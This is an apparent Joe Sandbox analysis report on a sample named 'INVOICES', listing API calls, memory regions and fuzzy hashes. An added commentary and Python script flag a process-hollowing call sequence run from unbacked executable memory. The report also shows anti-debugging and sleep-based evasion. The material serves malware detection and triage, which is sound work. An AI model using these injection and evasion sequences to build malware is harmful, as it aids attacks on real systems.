                                                                                                                                    • Part of subcall function 00733B4C: IsDebuggerPresent.KERNEL32 ref: 00733B8C
                                                                                                                                    • Part of subcall function 00733B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,007F52F8,007F52E0,?,?), ref: 00733BFD
                                                                                                                                    • Part of subcall function 00733B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00733C81
                                                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007349D2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2688871447-0
                                                                                                                                  • Opcode ID: bf38d18ab89a0f8f514a16a6f33162842b05ba96497411424ec2b2e55ec0c689
                                                                                                                                  • Instruction ID: 558af151783c4783f5066cd785bd8a9bdd724a9127cfbbd10d7ceac8a41d8f76
                                                                                                                                  • Opcode Fuzzy Hash: bf38d18ab89a0f8f514a16a6f33162842b05ba96497411424ec2b2e55ec0c689
                                                                                                                                  • Instruction Fuzzy Hash: C81190B14143159BD300EF29EC4996AFFE8FB84710F10C61EF58597272DBB89648CB9A
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00758CA8: __getptd_noexit.LIBCMT ref: 00758CA8
                                                                                                                                  • __lock_file.LIBCMT ref: 0075555B
                                                                                                                                    • Part of subcall function 00756D8E: __lock.LIBCMT ref: 00756DB1
                                                                                                                                  • __fclose_nolock.LIBCMT ref: 00755566
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2800547568-0
                                                                                                                                  • Opcode ID: ff27a0fed0d108d8487d9cc0cc463525d12c76cee94d2ff69ea24e46e2fb76eb
                                                                                                                                  • Instruction ID: 518fef91e2d9b6326124197fe97ca09b83e93a26da99c118e4a52886eee4828c
                                                                                                                                  • Opcode Fuzzy Hash: ff27a0fed0d108d8487d9cc0cc463525d12c76cee94d2ff69ea24e46e2fb76eb
                                                                                                                                  • Instruction Fuzzy Hash: B7F09071901A04DBEB50AB75880A7EE67A36F40333F248249BC14AB1C1EFFC490D9B52
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 00941A5B
                                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00941AF1
                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00941B13
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_940000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2438371351-0
                                                                                                                                  • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                                                                  • Instruction ID: 5965b45c387a248502fe5a80a08ef97a84abba5cf1438c9775bbdca5f9b26dbb
                                                                                                                                  • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                                                                  • Instruction Fuzzy Hash: 0712BD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
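The entry above is the one worth triaging in this section: CreateProcessW, Wow64GetThreadContext and a four-byte ReadProcessMemory are issued from the region at 0x940000, which the report marks as not backed by a PE image (the other entries come from the image mapped at 0x730000). That ordered trio is the preamble of process hollowing, and the context-flags argument 0x10007 is CONTEXT_i386 | CONTROL | INTEGER | SEGMENTS, i.e. CONTEXT_FULL for a WOW64 target. The script below is an added example, not Joe Sandbox code: it parses entries in this report's "APIs" / "Memory Dump Source" format and flags that sequence when it originates from executable memory that is not PE-backed. It generalizes past this entry to the A/W and native variants of the same three calls. The sample input is copied from entries on this page; the reading of the dump-name fields (index 4 as the PAGE_* protection, index 6 as MEM_IMAGE/MEM_PRIVATE) is an assumption inferred from the values in this report, not documented Joe Sandbox semantics.

```python
# Added triage helper for Joe Sandbox "APIs" / "Memory Dump Source" entries.
# Not Joe Sandbox code. Field meanings of the .sdmp name are an assumption.
import re
from dataclasses import dataclass, field
from typing import Optional

API_LINE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<parent>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref: (?P<ref>[0-9A-F]+)\s*$"
)
SOURCE_LINE = re.compile(
    r"^\s*•\s+Source File: (?P<name>\S+\.sdmp), Offset: (?P<offset>[0-9A-F]+), "
    r"based on PE: (?P<pe>true|false)"
)

PAGE_EXECUTE_MASK = 0xF0                    # PAGE_EXECUTE* constants (winnt.h)
MEM_IMAGE, MEM_PRIVATE = 0x1000000, 0x20000  # region type constants (winnt.h)
CONTEXT_I386 = 0x10000                       # x86 CONTEXT flag base (winnt.h)
CONTEXT_BITS = {0x1: "CONTROL", 0x2: "INTEGER", 0x4: "SEGMENTS", 0x8: "FLOATING_POINT",
                0x10: "DEBUG_REGISTERS", 0x20: "EXTENDED_REGISTERS"}

@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int
    parent: Optional[int]   # address of the subcall this line belongs to, else None

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    region: Optional[int] = None
    protection: Optional[int] = None
    region_type: Optional[int] = None
    pe_backed: Optional[bool] = None

def parse_entries(text: str) -> list:
    """One FunctionEntry per 'APIs'/'Strings' block, with its dump-source region."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() in ("APIs", "Strings"):
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] is not None else []
            cur.calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16),
                                     int(m["parent"], 16) if m["parent"] else None))
            continue
        m = SOURCE_LINE.match(line)
        if m:
            f = m["name"].split(".")
            cur.region = int(m["offset"], 16)
            cur.protection = int(f[4], 16)    # assumption: PAGE_* protection field
            cur.region_type = int(f[6], 16)   # assumption: MEM_IMAGE / MEM_PRIVATE field
            cur.pe_backed = m["pe"] == "true"
    return entries

def decode_context_flags(value: int) -> str:
    """Render a CONTEXT flags argument (e.g. 0x10007) as its winnt.h names."""
    if value & CONTEXT_I386 != CONTEXT_I386:
        return f"0x{value:X} (not an x86 CONTEXT)"
    names = "|".join(n for bit, n in CONTEXT_BITS.items() if value & bit)
    return "CONTEXT_i386|" + names + (" (= CONTEXT_FULL)" if value & 0x7 == 0x7 else "")

# Ordered steps of the hollowing preamble; each step accepts the common variants.
HOLLOWING_STEPS = (
    {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"},
    {"GetThreadContext", "Wow64GetThreadContext"},
    {"ReadProcessMemory", "NtReadVirtualMemory"},
)

def has_hollowing_preamble(entry: FunctionEntry) -> bool:
    """True if the entry's own calls (subcalls excluded) contain the steps in order."""
    own = iter(c.api for c in entry.calls if c.parent is None)
    return all(any(name in step for name in own) for step in HOLLOWING_STEPS)

def triage(entry: FunctionEntry) -> dict:
    executable = bool(entry.protection and entry.protection & PAGE_EXECUTE_MASK)
    ctx = [c for c in entry.calls if c.api in HOLLOWING_STEPS[1]]
    flags = None
    if ctx and len(ctx[0].args) >= 2 and ctx[0].args[1] != "?":
        flags = decode_context_flags(int(ctx[0].args[1], 16))
    preamble = has_hollowing_preamble(entry)
    unbacked = executable and entry.pe_backed is False
    verdict = ("likely process hollowing" if preamble and unbacked
               else "review" if preamble else "benign pattern")
    return {"region": f"0x{entry.region:X}" if entry.region is not None else None,
            "executable": executable, "pe_backed": entry.pe_backed,
            "unbacked_code": unbacked, "hollowing_preamble": preamble,
            "context_flags": flags, "verdict": verdict}

# Sample input copied from two entries on this page (not constructed data).
SAMPLE = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00941A5B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00941AF1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00941B13
Memory Dump Source
• Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
APIs
  • Part of subcall function 00752ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00759BA4), ref: 00752EE9
  • Part of subcall function 00752ED5: GetLastError.KERNEL32(00000000,?,00759BA4), ref: 00752EFB
• _free.LIBCMT ref: 00798DD5
• _free.LIBCMT ref: 00798DE7
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
"""

if __name__ == "__main__":
    for entry in parse_entries(SAMPLE):
        print(triage(entry))
```

The check deliberately ignores "Part of subcall function" lines when matching the sequence, so CRT helpers that happen to call GetLastError or RtlFreeHeap in a subcall do not pollute the match; the region test is what separates this entry from the ordinary image-backed ones, since CreateProcessW followed by a context read is also what a debugger or launcher does.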
APIs
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: 3cabccc1e1fb22b53d002145ae8c69927998026dc891d1714fa5a54a4b3de18e
• Instruction ID: 1c0b9ae01b99684331115036ea27160109e63704be34a75e973b10e63bd93677
• Opcode Fuzzy Hash: 3cabccc1e1fb22b53d002145ae8c69927998026dc891d1714fa5a54a4b3de18e
• Instruction Fuzzy Hash: 32413B74504341DFEB14DF14C489B1ABBE0BF45318F1988ACE9994B362C77AEC55CB92
APIs
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: 30ef8d447fbdf0a5163e5a247deac19081f4f0f688b4fe2d178737b0a3cdba36
• Instruction ID: 00ec930454f32dd587f6fd388c0c5eeb215297fc1140075d3e3557fa3a20427a
• Opcode Fuzzy Hash: 30ef8d447fbdf0a5163e5a247deac19081f4f0f688b4fe2d178737b0a3cdba36
• Instruction Fuzzy Hash: 332106B2604609EBDB245F21FC817A97BB8FF18351F21842DE987C9092EB3894D0D754
APIs
  • Part of subcall function 00734D13: FreeLibrary.KERNEL32(00000000,?), ref: 00734D4D
  • Part of subcall function 007553CB: __wfsopen.LIBCMT ref: 007553D6
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00734F6F
  • Part of subcall function 00734CC8: FreeLibrary.KERNEL32(00000000), ref: 00734D02
                                                                                                                                    • Part of subcall function 00734DD0: _memmove.LIBCMT ref: 00734E1A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1396898556-0
                                                                                                                                  • Opcode ID: 739a7faaa0eea00e0c53502f8504b47373c745cbfef9eac16977095586312dbc
                                                                                                                                  • Instruction ID: 54bcf6da6de282e90406b1bedba7d0a05f4e34957237f8b2f2430a21064d8fdb
                                                                                                                                  • Opcode Fuzzy Hash: 739a7faaa0eea00e0c53502f8504b47373c745cbfef9eac16977095586312dbc
                                                                                                                                  • Instruction Fuzzy Hash: C511EE3271060AEAEF28AF70DC1AFAD77A59F40700F148529F94196182DA799D159B60
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                  • Opcode ID: 7d4de3f8c9f935c2dbdac73292217d43c2aa995a5faa20545ae0674c32b79cb0
                                                                                                                                  • Instruction ID: 1e5b683bc336448de625959656d294e4ed1755bdf615f642d431aa257b7eff9f
                                                                                                                                  • Opcode Fuzzy Hash: 7d4de3f8c9f935c2dbdac73292217d43c2aa995a5faa20545ae0674c32b79cb0
                                                                                                                                  • Instruction Fuzzy Hash: F52133B0508341DFDB14DF24C84AB5ABBE0BF88314F05896CE89A47762D739E819CB93
                                                                                                                                  APIs
                                                                                                                                  • __lock_file.LIBCMT ref: 00754A16
                                                                                                                                    • Part of subcall function 00758CA8: __getptd_noexit.LIBCMT ref: 00758CA8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __getptd_noexit__lock_file
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2597487223-0
                                                                                                                                  • Opcode ID: 98db41fb79ddcd5553e8d5bef3d840408e2de9931cc5df3594f3ef94f57d9dbf
                                                                                                                                  • Instruction ID: c9ba997bfb08e3e408025f2c5cf2397a874aebafcbdac788642ab548815a1433
                                                                                                                                  • Opcode Fuzzy Hash: 98db41fb79ddcd5553e8d5bef3d840408e2de9931cc5df3594f3ef94f57d9dbf
                                                                                                                                  • Instruction Fuzzy Hash: CEF0AF32940245EBDF91AF748C0E3DE36A1AF0032BF04C514BC24AA191DBFC8A98DF52
                                                                                                                                  APIs
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,007F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00734FDE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                  • Opcode ID: a17dbec5625d7ce88cf8da9c715e0ef5c2d6110b07c912322323bbca15b73dbb
                                                                                                                                  • Instruction ID: 34d67188380e59aa9fa7f1049fbcbdc35b37891d01e9f131fff9ec399afde082
                                                                                                                                  • Opcode Fuzzy Hash: a17dbec5625d7ce88cf8da9c715e0ef5c2d6110b07c912322323bbca15b73dbb
                                                                                                                                  • Instruction Fuzzy Hash: 9AF03971105712CFDB389F64E894822BBE2AF0532972C8E3EE5D682612C739A854DF40
                                                                                                                                  APIs
                                                                                                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00750930
                                                                                                                                    • Part of subcall function 00737D2C: _memmove.LIBCMT ref: 00737D66
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongNamePath_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2514874351-0
                                                                                                                                  • Opcode ID: 8f178b1f4e60ca5ead118b282b7f8810c2cd17a95a963727a1548468abbdaee0
                                                                                                                                  • Instruction ID: 2a8998de8645f3d0984e77d888156ba7ea02fb22cd6aa135fd331c164e77930a
                                                                                                                                  • Opcode Fuzzy Hash: 8f178b1f4e60ca5ead118b282b7f8810c2cd17a95a963727a1548468abbdaee0
                                                                                                                                  • Instruction Fuzzy Hash: 61E0CD76A0512C97C720D6A89C09FFA77EDDF88790F0441B6FC0DD7305D9655C81C690
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __wfsopen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 197181222-0
                                                                                                                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                  • Instruction ID: 7ed4d4bcd970db34338de9d0f3808dfcff6a1f23398a05c45f28632902a55b50
                                                                                                                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                  • Instruction Fuzzy Hash: E0B0927644020CB7CE012A82EC02A893B599B407A8F408060FF0C181A2A6B7B6649689
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                  • Instruction ID: b62f751dcf9095284ebac31a1acd3b1cef1ace876cbae8984ef2f3b1138a4af7
                                                                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                  • Instruction Fuzzy Hash: C531F774A001099BCB18DF58D4819A9FBB2FF49302B7886A5E809CB351DB74EDC5CBC0
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 009422B1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_940000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                  • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                  • Instruction ID: b58d0797761a234c4394fac1c273aecf2485470c36b536af7e35a82110550cef
                                                                                                                                  • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                  • Instruction Fuzzy Hash: 91E0BF7494010EEFDB00EFA4D5496DE7BB4FF04311F1005A1FD05D7680DB709E548A62
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 009422B1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
